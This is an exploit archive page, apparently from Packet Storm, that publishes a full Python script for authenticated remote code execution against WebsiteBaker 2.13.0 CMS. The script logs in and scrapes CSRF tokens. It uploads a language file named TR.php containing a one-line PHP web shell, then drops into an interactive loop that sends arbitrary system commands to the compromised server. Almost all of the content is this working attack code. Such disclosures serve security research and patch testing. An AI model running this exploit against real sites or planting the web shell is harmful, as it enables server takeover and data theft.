exploit the possibilities

WebsiteBaker 2.13.0 Remote Code Execution

WebsiteBaker 2.13.0 Remote Code Execution
Posted Sep 21, 2021
Authored by Halit Akaydin

WebsiteBaker version 2.13.0 authenticated remote code execution exploit.

tags | exploit, remote, code execution
MD5 | 879ffeddf168aab8e205fd99f221cb9b

WebsiteBaker 2.13.0 Remote Code Execution

Change Mirror Download
# Exploit Title: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 18-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://websitebaker.org/
# Software Link: http://wiki.websitebaker.org/doku.php/en/downloads
# Version: 2.13.0
# Category: Webapps
# Tested on: Linux/Windows

# WebsiteBaker Open Source Content Management
# Includes an endpoint that allows remote access
# Language page misconfigured, causing vulnerability
# User information with sufficient permissions is required.
# I had to write a long script to bypass some security measures.

# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
# python3 exploit.py -h


from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse


def main():
parser = argparse.ArgumentParser(
description='WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)'
)
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-l', '--login', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
args = parser.parse_args()
print("\nWebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
sleep(2)
find_default(args)



def find_default(args):
#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
sleep(2)
else:
print("\n[?] Check Adress...\n")
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
sleep(2)


# Check Host Status
try:
response = requests.get(args.host)
if response.status_code != 200:
print("[-] Address not reachable!\n")
sleep(2)
exit(1)

except requests.ConnectionError as exception:
print("[-] Address not reachable!\n")
sleep(2)
exit(1)

exploit(args)

url = args.host + "/admin/login/index.php"
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/admin/addons/index.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
response = requests.get(url, headers=headers)
for cookie in response.cookies:
phpsessid_name = cookie.name

soup = BeautifulSoup(response.text, 'html.parser')
input_hidden_username = (soup.find_all("input", type="hidden")[1].get("value"))
input_hidden_password = (soup.find_all("input", type="hidden")[2].get("value"))
input_hidden_name = (soup.find_all("input", type="hidden")[3].get("name"))
input_hidden_value = (soup.find_all("input", type="hidden")[3].get("value"))


login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value)



def login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value):

session = requests.session()

url = args.host + "/admin/login/index.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}"
}

headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/admin/login/index.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9", "Connection": "close"
}

data = {
"url": '',
"username_fieldname": input_hidden_username,
"password_fieldname": input_hidden_password,
input_hidden_name: input_hidden_value,
input_hidden_username : args.login,
input_hidden_password : args.password,
"submit": ''
}


response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
new_cookie = (response.cookies.get(phpsessid_name))

if response.headers.get("Location") == args.host + "/admin/start/index.php":
print("[+] Success Login...\n")
sleep(2)
check_pers(args, phpsessid_name, new_cookie)
else:
print("[-] Login Failed...\n")
print("Your username or password is incorrect.")
sleep(2)


def check_pers(args, phpsessid_name, new_cookie):
url = args.host + "/admin/languages/install.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}",
phpsessid_name : new_cookie
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
response = requests.get(url, headers=headers, cookies=cookies)
soup = BeautifulSoup(response.text, 'html.parser')

if (soup.find_all("title")[0].text == "Enter your website title » Administration - Add-ons"):
find_token(args, phpsessid_name, new_cookie)
else:
print("[!] Unauthorized user!\n\n")
print("Requires user with language editing permissions.")
sleep(2)
exit(1)


def find_token(args, phpsessid_name, new_cookie):
url = args.host + "/admin/languages/index.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}",
phpsessid_name : new_cookie
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
response = requests.get(url, headers=headers, cookies=cookies)
soup = BeautifulSoup(response.text, 'html.parser')
token_hidden_name = soup.find_all("input", type="hidden")[5].get("name")
token_hidden_value = soup.find_all("input", type="hidden")[5].get("value")


if soup.find_all("option")[1].text == "":
exploit(args)
elif soup.find_all("option")[20].text == "Türkçe":
token_lang = soup.find_all("option")[20].get("value")
uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang)
else:
install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value)
pass


def install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value):
url = args.host + "/admin/languages/install.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}",
phpsessid_name: new_cookie
}

headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryCyjXuM2KSAsqjze1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/admin/languages/index.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}

data = "------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ninstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"advanced\"\r\n\r\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\""+token_hidden_name+"\"\r\n\r\n"+token_hidden_value+"\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"TR.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nInstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"overwrite\"\r\n\r\ntrue\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1--\r\n"
response = requests.post(url, headers=headers, cookies=cookies, data=data)
soup = BeautifulSoup(response.text, 'html.parser')
# print(soup.find_all("div", class_="w3-text-grey w3--medium"))
print("[!] Installing Vuln Lang File!\n")
sleep(2)
find_token(args, phpsessid_name, new_cookie)



def uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang):

url = args.host + "/admin/languages/uninstall.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}",
phpsessid_name: new_cookie
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/admin/languages/index.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = {
"action": "uninstall",
"advanced": '',
token_hidden_name : token_hidden_value,
"file": token_lang,
"submit": "Uninstall"
}
response = requests.post(url, headers=headers, cookies=cookies, data=data)
soup = BeautifulSoup(response.text, 'html.parser')
print("[!] Uninstall Lang File!\n")
# print(soup.find_all("div", class_="w3-text-grey w3--medium"))
sleep(2)
find_token(args, phpsessid_name, new_cookie)



def exploit(args):
response = requests.get(args.host + "/languages/TR.php?cmd=whoami")
if response.status_code == 200:
print("[*] Exploit File Exists!\n")
sleep(2)
print("[+] Exploit Done!\n")
sleep(2)

while True:
cmd = input("$ ")
url = args.host + "/languages/TR.php?cmd=" + cmd
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
}

response = requests.post(url, headers=headers, timeout=5)

if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)

if __name__ == '__main__':
main()

Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    2 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    14 Files
  • 19
    Oct 19th
    15 Files
  • 20
    Oct 20th
    20 Files
  • 21
    Oct 21st
    12 Files
  • 22
    Oct 22nd
    14 Files
  • 23
    Oct 23rd
    3 Files
  • 24
    Oct 24th
    1 Files
  • 25
    Oct 25th
    33 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close